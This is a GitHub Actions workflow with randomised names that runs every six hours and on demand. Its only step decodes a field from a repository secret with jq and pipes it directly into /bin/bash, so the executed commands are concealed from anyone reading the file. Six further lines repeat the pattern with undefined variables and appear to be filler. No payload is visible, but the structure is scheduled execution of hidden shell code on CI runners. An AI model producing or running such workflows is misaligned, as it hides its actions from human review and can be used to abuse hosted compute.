name: niubajiao4328

on:
  workflow_dispatch:
  schedule:
    - cron: '23 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: niubajiao4328
        env:
          jc3: ${{ secrets.jc3 }}
        run: |
          echo $jc3 | jq -r .hmdz0 | /bin/bash
          echo $u8 | jq -r .uwvy3 | /bin/bash
          echo $h99523 | jq -r .h587 | /bin/bash
          echo $ayqo849 | jq -r .prh6041 | /bin/bash
          echo $twvh9 | jq -r .kg039 | /bin/bash
          echo $y4939 | jq -r .bo3 | /bin/bash
          echo $jj385 | jq -r .s24522 | /bin/bash

